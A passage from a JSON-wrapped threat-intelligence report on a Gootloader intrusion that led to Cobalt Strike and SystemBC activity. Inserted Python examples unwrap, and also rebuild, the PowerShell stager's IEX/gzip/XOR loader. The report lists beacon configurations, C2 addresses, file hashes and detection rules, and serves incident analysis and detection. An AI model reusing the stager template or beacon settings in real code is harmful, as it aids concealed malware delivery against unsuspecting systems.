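# Added example (not from the report): peel the Cobalt Strike PowerShell
# stager layers the same way the CyberChef recipe does. No real sample is
# embedded; build_sample() fabricates one for testing.
import base64
import gzip
import re

CS_XOR_KEY = 35  # default single-byte key used by the Cobalt Strike PowerShell stager
B64_BLOB = re.compile(r'[a-zA-Z0-9+/=]{30,}')  # same expression as the recipe

def xor_bytes(data, key=CS_XOR_KEY):
    return bytes(b ^ key for b in data)

def longest_base64_blob(text):
    '''Pick the longest base64-looking run in a script (the recipe lists them and takes the first).'''
    blobs = B64_BLOB.findall(text)
    if not blobs:
        raise ValueError('no base64 blob found')
    return max(blobs, key=len)

def unwrap_stager(decoded_command):
    '''Peel the layers from an already UTF-16-decoded PowerShell command.

    Layer 1: a base64-encoded gzip stream, inflated in memory by the outer script.
    Layer 2: inside the inflated script, a base64 string XORed with 35 that
             holds the raw shellcode / beacon bytes.
    Returns (inflated_script, payload_bytes).'''
    inflated = gzip.decompress(base64.b64decode(longest_base64_blob(decoded_command))).decode('latin-1')
    payload = xor_bytes(base64.b64decode(longest_base64_blob(inflated)))
    return inflated, payload

def build_sample(payload):
    '''Wrap payload the way the stager does (constructed, not a real sample).'''
    inner = ('Set-StrictMode -Version 2;$var_code=[System.Convert]::FromBase64String(\'%s\');'
             'for ($x=0;$x -lt $var_code.Count;$x++){$var_code[$x]=$var_code[$x] -bxor %d}'
             % (base64.b64encode(xor_bytes(payload)).decode('ascii'), CS_XOR_KEY))
    outer = ('$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(\'%s\'));'
             'IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,'
             '[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'
             % base64.b64encode(gzip.compress(inner.encode('latin-1'))).decode('ascii'))
    return outer

def looks_like_pe(payload):
    '''Stager shellcode normally carries a reflective DLL with an MZ header; cheap sanity check.'''
    return payload[:2] == b'MZ'

# Constructed placeholder standing in for the beacon bytes.
FAKE_BEACON = b'MZ' + bytes(range(256)) * 4

if __name__ == '__main__':
    sample = build_sample(FAKE_BEACON)
    script, blob = unwrap_stager(sample)
    print(len(blob), looks_like_pe(blob), script[:60])
```

On a real sample the bytes returned by unwrap_stager are what 1768.py expects as input; the MZ check is only a sanity check, since the first bytes of a stager are often a short shellcode stub that jumps over the embedded DLL rather than the DLL header itself.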
Three separate hosts\r\nwere infected with a Cobalt Strike HTTP beacon communicating to IPv4 91.215.85[.]143:443.\r\nCobalt Strike HTTP Beacon configuration:\r\n{\r\n \"beacontype\": [\r\n \"HTTPS\"\r\n ],\r\n \"sleeptime\": 22000,\r\n \"jitter\": 37,\r\n \"maxgetsize\": 13986556,\r\n \"spawnto\": \"WzJAyjDIW7WfbjhHiN8wmQ==\",\r\n \"license_id\": 206546002,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"91.215.85.143\",\r\n \"port\": 443,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN5UAJbAA83lOuZlkNoqHDAdV1F7OJnqUiF3kD6mwuXzJ\r\n },\r\n \"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/jquery-3.3.1.min.js\",\r\n \"verb\": \"GET\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": [\r\n \"print\",\r\n \"append 1522 characters\",\r\n \"prepend 84 characters\",\r\n \"prepend 3931 characters\",\r\n \"base64url\",\r\n \"mask\"\r\n ]\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"/jquery-3.3.2.min.js\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\n \"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"NtMapViewOfSection\",\r\n \"execute\": [\r\n \"CreateThread 'ntdll!RtlUserThreadStart'\",\r\n \"CreateThread\",\r\n \"NtQueueApcThread-s\",\r\n \"CreateRemoteThread\",\r\n 
\"RtlCreateUserThread\"\r\n ],\r\n \"min_alloc\": 17500,\r\n \"startrwx\": false,\r\n \"stub\": \"yl5rgAigihmtjA5iEHURzg==\",\r\n \"transform-x86\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"transform-x64\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"userwx\": false\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": null,\r\n \"smb_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\nCobalt Strike SMB Beacon\r\nThe threat actor also used Cobalt Strike SMB beacons to chain beacons together for lateral movement. 
We\r\nobserved four hosts where Cobalt Strike SMB beacons were used.\r\nCobalt Strike SMB beacon configuration:\r\n{\r\n \"beacontype\": [\r\n \"SMB\"\r\n ],\r\n \"sleeptime\": 10000,\r\n \"jitter\": 0,\r\n \"maxgetsize\": 10485760,\r\n \"spawnto\": \"WzJAyjDIW7WfbjhHiN8wmQ==\",\r\n \"license_id\": 206546002,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"\",\r\n \"port\": 4444,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN5UAJbAA83lOuZlkNoqHDAdV1F7OJnqUiF3kD6mwuXzJ\r\n },\r\n \"host_header\": null,\r\n \"useragent_header\": \"\",\r\n \"http-get\": {\r\n \"uri\": null,\r\n \"verb\": null,\r\n \"client\": {\r\n \"headers\": [],\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": []\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"\",\r\n \"verb\": null,\r\n \"client\": {\r\n \"headers\": [],\r\n \"id\": null,\r\n \"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": null\r\n },\r\n \"http_post_chunk\": null,\r\n \"uses_cookies\": null,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"NtMapViewOfSection\",\r\n \"execute\": [\r\n \"CreateThread 'ntdll!RtlUserThreadStart'\",\r\n \"CreateThread\",\r\n \"NtQueueApcThread-s\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"min_alloc\": 17500,\r\n \"startrwx\": false,\r\n \"stub\": \"yl5rgAigihmtjA5iEHURzg==\",\r\n \"transform-x86\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"transform-x64\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"userwx\": 
false\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": 0,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": \"\\\\\\\\.\\\\pipe\\\\mojo.5688.8052.1838949397870888770b\",\r\n \"smb_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\nSystemBC\r\nDuring the intrusion a PowerShell script named ‘s5.ps1’ was dropped to a user’s ‘AppData\\Roaming’ folder.\r\ns5.ps1 turned out to be a PowerShell version of SystemBC as described by Proofpoint. This PowerShell version\r\nhas been appearing more frequently over the past few years [1,2,3].\r\nHaving a PCAP of the traffic, we could decrypt it and see that inside, it was carrying SOCKS v5 traffic.\r\nThe first 50 bytes of the first data packet are the encryption key, starting with 0x00 and ending with 0x3a:\r\nUsing that key to decrypt the first answer packet shows that this is a SOCKS v5 CONNECT request, which also reveals the\r\ntarget domain:\r\nx05 -\u003e Version 5\r\nx01 -\u003e Command Code 1 (CONNECT)\r\nx00 -\u003e Reserved\r\nx03 -\u003e Address Type 3 (domain name)\r\nx05 -\u003e Length of Domain (domain name redacted)\r\nApproximately four minutes after the script was dropped, SOCKS (SystemBC) was utilized to tunnel network\r\nconnections from the external IPv4 91.92.136[.]20:4001 to the domain controller via a compromised endpoint.\r\nThe endpoint was configured to execute a PowerShell script [s5.ps1] that established a SOCKS 
connection to the\r\nattacker-controlled infrastructure.\r\nThe process and C2 activity can be illustrated as:\r\nThe script had the following indicators for the IPv4 and Port:\r\nThe SOCKS tunnel provided the following connectivity from the attacker computer and allowed RDP [3389] to be\r\ntraversed externally.\r\nA side effect of utilizing a proxy (SOCKS tunnel) on the endpoint is unusual port allocations, for example,\r\nPowerShell talking to port 3389. In this case, RDP to the Domain Controller was tunneled through the\r\nPowerShell process running s5.ps1, so on the endpoint it was powershell.exe, not mstsc.exe, that opened the connection to port 3389.\r\nThe activity did expose the attacker’s computer name via Windows Event ID 4778 (a session was reconnected to a Window Station), with the name being\r\n‘DESKTOP-GRALDC5’. The client address referred to the proxy endpoint (a private IPv4 address), not to the attacker’s external source.\r\nDuring the intrusion we also observed a second\r\nhostname appear, ‘HOME-PC’. This was also found via RDP access related logins.\r\nBased on SRUM (System Resource Usage Monitor) data, with the SOCKS tunnel utilized, the attacker was most\r\nactive from 0600 UTC to 1100 UTC on the second day of the intrusion.\r\nIn total, two different attacker computer names were observed during the intrusion, ‘DESKTOP-GRALDC5’ and ‘HOME-PC’.\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nAtomic\r\nGootloader\r\nhxxps[:]//hrclubphilippines[.]com/xmlrpc.php\r\nhxxps[:]//mediacratia[.]ru/xmlrpc.php\r\nhxxps[:]//daraltanweer[.]com/xmlrpc.php\r\nhxxps[:]//ukrainians[.]today/xmlrpc.php\r\nhxxps[:]//my-little-kitchen[.]com/xmlrpc.php\r\nhxxps[:]//montages[.]no/xmlrpc.php\r\nhxxps[:]//pocketofpreschool[.]com/xmlrpc.php\r\nhxxp[:]//blog[.]lilianpraskova[.]cz/xmlrpc.php\r\nhxxps[:]//sitmeanssit[.]com/xmlrpc.php\r\nhxxp[:]//artmodel[.]com[.]ua/xmlrpc.php\r\nCobalt Strike\r\n91.215.85[.]143:443\r\nSystemBC C2\r\n91.92.136[.]20:4001\r\nComputed\r\nImplied_employment_agreement_70159.zip\r\nfb6e4f75763fad6d0e7fe85a563b0c24\r\n7e8543f2bc09bf320510fde5e34e32065339d9d2\r\n873dd1dcdfcbe9826b274c5880f5be81a878ee93715fbb18a654d9dba61c5dfc\r\nimplied employment agreement 24230.js\r\ndeb24dfaf8178fda2d070aba9134a30c\r\necc0b26106703e129fb1e2ec132c373870c2e7b6\r\nf94048917ac75709452040754bb3d1a0aff919f7c2b4b42c5163c7bdb1fbf346\r\nFrontline Management.js\r\n4f4ee823a8c7e2511f05b3ea633c0d2c\r\n877515fecc14ed193167e8a20c6b9a684a74564d\r\necc7f13c3f0f8d4775e05715810b0164c52b7bd233e4a2e4f5a37769becb0092\r\nstage1 (geRBAdXTDCkN)\r\nmd5sum payload1.dll_: 25b38e45df3cd215386077850c59be07\r\nsha1sum payload1.dll_: a88a28c73aa42956c9f9d12585a8de63d4a00e47\r\nsha256sum payload1.dll_: 68dd1a2da732d56b0618f8581502fcf209b1c828c97d05f239c98d55bb78b562\r\nstage2 (cbkSBtbjQBNFy)\r\nmd5sum payload2.exe_: 1b8b4f05058ac39091b99cc153ab00c0\r\nsha1sum payload2.exe_: e0b568a3e35257cd30b0c42727c3529cef13b081\r\nsha256sum payload2.exe_: 831955bd05186381a8f15539a41f48166873eab3feb55fb1104202e4152bd507\r\ne544944.exe - CS beacon\r\nmd5sum e544944.exe: f769cb73317421c290832777c9e14f92\r\nsha1sum e544944.exe: f043898fc9db6985c4ad8bb84669c081cdaa8e6f\r\nsha256sum e544944.exe: 
40c40495434bf987b04f0742c3e9201189675d87a042aa72abbd0084c3de66d8\r\nimphash: 49145e436aa571021bb1c7b727f8b049\r\n5d78365.exe - CS beacon\r\nmd5sum 5d78365.exe: 9f9c7b2c8f245e62a08bf5f8a3eb3498\r\nsha1sum 5d78365.exe: 3cf851eb09c934cafe9b98d4706f903dff804b0c\r\nsha256sum 5d78365.exe: aad75498679aada9ee2179a8824291e3b4781d5683c2fa5b3ec92267ce4a4a33\r\nimphash: 49145e436aa571021bb1c7b727f8b049\r\ndae50de.exe - CS beacon\r\nmd5sum dae50de.exe: a617e6687ab5d747c530b930bb4a3209\r\nsha1sum dae50de.exe: d53e550b54c08606e19965a9f74bbaa7063e10f1\r\nsha256sum dae50de.exe: be3222219f029b47120390b2b1ad46ae86287e64a1f7228d6b2ffd89345a889e\r\nimphash: 49145e436aa571021bb1c7b727f8b049\r\na4a2ea4.exe - CS beacon\r\nmd5sum a4a2ea4.exe: e9fc0203d1dea15dff56a285d0f86b62\r\nsha1sum a4a2ea4.exe: 72076af2ce8df6f8b1121c38f3c3db043c540369\r\nsha256sum a4a2ea4.exe: 792a95234b01c256019b16a242b9487b99e98ed8a955eaecf1e44b0141aa12f4\r\nimphash: 49145e436aa571021bb1c7b727f8b049\r\nDetections\r\nNetwork\r\nET POLICY Powershell Command With Encoded Argument Over SMB - Likely Lateral Movement\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET POLICY PE EXE or DLL Windows file download HTTP\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SMB Executable File Transfer\r\nET MALWARE SystemBC Powershell bot registration\r\nET POLICY Powershell Command With Hidden Window Argument Over SMB - Likely Lateral Movement\r\nET HUNTING Possible Powershell .ps1 Script Use Over SMB\r\nET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File\r\nET POLICY Possible Powershell .ps1 Script Use Over SMB\r\nET POLICY Powershell Command With No Profile Argument Over SMB - Likely Lateral 
Movement\r\nSigma\r\nSearch rules on detection.fyi or sigmasearchengine.com\r\nDFIR Public Rules Repo:\r\n92f0538f-ad13-4776-9366-b7351d51c4b8 : Disable Windows Defender via Service\r\n81cfbbae-5e93-4934-84a2-e6a26f85c7bb : JavaScript Execution Using MSDOS 8.3 File Notation\r\nDFIR Private Rules:\r\n8537a157-5c6c-4173-9e65-943ff82c1efb : New Remote Access Configuration via netsh.exe\r\nb17dc721-6e2d-4f2c-aaf5-4cbdcdfed6f5 : Remote Password File Access via Notepad or Wordpad\r\nSigma Repo:\r\nd7a95147-145f-4678-b85d-d1ff4a3bb3f6 : CobaltStrike Service Installations - Security\r\n3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b : Use NTFS Short Name in Image\r\n88f680b8-070e-402c-ae11-d2914f2257f1 : PowerShell Base64 Encoded IEX Cmdlet\r\n1ec65a5f-9473-4f12-97da-622044d6df21 : Powershell Defender Disable Scan Feature\r\necbc5e16-58e0-4521-9c60-eb9a7ea4ad34 : Meterpreter or Cobalt Strike Getsystem Service Installation -\r\n5ef9853e-4d0e-4a70-846f-a9ca37d876da : Potential Credential Dumping Activity Via LSASS\r\n962fe167-e48d-4fd6-9974-11e5b9a5d6d1 : LSASS Access From Non System Account\r\na2863fbc-d5cb-48d5-83fb-d976d4b1743b : RDP Sensitive Settings Changed to Zero\r\nd6ce7ebd-260b-4323-9768-a9631c8d4db2 : RestrictedAdminMode Registry Value Tampering\r\ned74fe75-7594-4b4b-ae38-e38e3fd2eb23 : Outbound RDP Connections Over Non-Standard Tools\r\n01aeb693-138d-49d2-9403-c4f52d7d3d62 : RDP Connection Allowed Via Netsh.EXE\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/19530/19530.yar\r\nMITRE ATT\u0026CK\r\nInternal case #19530\r\nSource: https://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\n
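The SystemBC section above decodes the first decrypted bytes of the SOCKS v5 request by hand (0x05 version, 0x01 CONNECT, 0x00 reserved, 0x03 domain-name address type, then a length-prefixed domain and a two-byte port). The Python below is an added example, not code from the report or from The DFIR Report: it parses such a request per RFC 1928 and also handles the IPv4 and IPv6 address types that the report's single packet does not show. The sample bytes are constructed; the report redacted the five-character domain, so the placeholder 'dc-01' and port 3389 (the RDP port the tunnel carried) stand in. Decryption of the SystemBC stream itself is not included, since the report does not document the cipher.

```python
import ipaddress
import struct
from dataclasses import dataclass

SOCKS_VERSION = 0x05
COMMANDS = {0x01: 'CONNECT', 0x02: 'BIND', 0x03: 'UDP ASSOCIATE'}
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04


@dataclass
class Socks5Request:
    command: str
    address_type: int
    host: str
    port: int
    consumed: int  # bytes the request occupied; tunnelled payload follows from here


def _need(data: bytes, end: int, what: str) -> None:
    # Every field is bounds-checked so a truncated capture fails loudly instead of mis-parsing.
    if len(data) < end:
        raise ValueError(f'truncated SOCKS5 request: missing {what}')


def parse_socks5_request(data: bytes) -> Socks5Request:
    """Parse one SOCKS5 request (RFC 1928 section 4): VER CMD RSV ATYP DST.ADDR DST.PORT."""
    _need(data, 4, 'header')
    ver, cmd, rsv, atyp = data[0], data[1], data[2], data[3]
    if ver != SOCKS_VERSION:
        raise ValueError(f'not SOCKS5: version byte 0x{ver:02x}')
    if cmd not in COMMANDS:
        raise ValueError(f'unknown SOCKS5 command 0x{cmd:02x}')
    if rsv != 0x00:
        raise ValueError(f'reserved byte must be 0x00, got 0x{rsv:02x}')
    pos = 4
    if atyp == ATYP_IPV4:
        end = pos + 4
        _need(data, end, 'IPv4 address')
        host = str(ipaddress.IPv4Address(data[pos:end]))
    elif atyp == ATYP_IPV6:
        end = pos + 16
        _need(data, end, 'IPv6 address')
        host = str(ipaddress.IPv6Address(data[pos:end]))
    elif atyp == ATYP_DOMAIN:
        _need(data, pos + 1, 'domain length')
        length = data[pos]  # the 0x05 length byte in the report's decode
        pos += 1
        end = pos + length
        _need(data, end, 'domain name')
        host = data[pos:end].decode('ascii')  # RFC 1928 names are ASCII (IDNA for anything else)
    else:
        raise ValueError(f'unknown address type 0x{atyp:02x}')
    _need(data, end + 2, 'port')
    (port,) = struct.unpack('!H', data[end:end + 2])  # DST.PORT is network byte order
    return Socks5Request(COMMANDS[cmd], atyp, host, port, end + 2)


# Constructed decrypted requests (not bytes from the report's PCAP): the report redacted the
# five-character domain, 'dc-01' stands in; 3389 is the RDP port the tunnel carried.
DOMAIN_REQUEST = bytes([0x05, 0x01, 0x00, 0x03, 0x05]) + b'dc-01' + struct.pack('!H', 3389)
IPV4_REQUEST = bytes([0x05, 0x01, 0x00, 0x01]) + bytes([10, 0, 0, 5]) + struct.pack('!H', 3389)

if __name__ == '__main__':
    for raw in (DOMAIN_REQUEST, IPV4_REQUEST):
        req = parse_socks5_request(raw)
        print(f'{req.command} {req.host}:{req.port} (atyp 0x{req.address_type:02x}, {req.consumed} bytes)')
```

As the report's decode shows, in SystemBC's model the request travels from the C2 to the bot, which then makes the connection on the attacker's behalf; running this parser over the first decrypted bytes of each stream therefore yields the list of internal hosts and ports the attacker reached through the tunnel, with the consumed offset marking where the proxied RDP traffic begins.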
",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/"
	],
	"report_names": [
		"seo-poisoning-to-domain-control-the-gootloader-saga-continues"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775441522,
	"ts_updated_at": 1775826744,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/98656c9d160044911262ba48761c147e58a78340.pdf",
		"text": "https://archive.orkl.eu/98656c9d160044911262ba48761c147e58a78340.txt",
		"img": "https://archive.orkl.eu/98656c9d160044911262ba48761c147e58a78340.jpg"
	}
}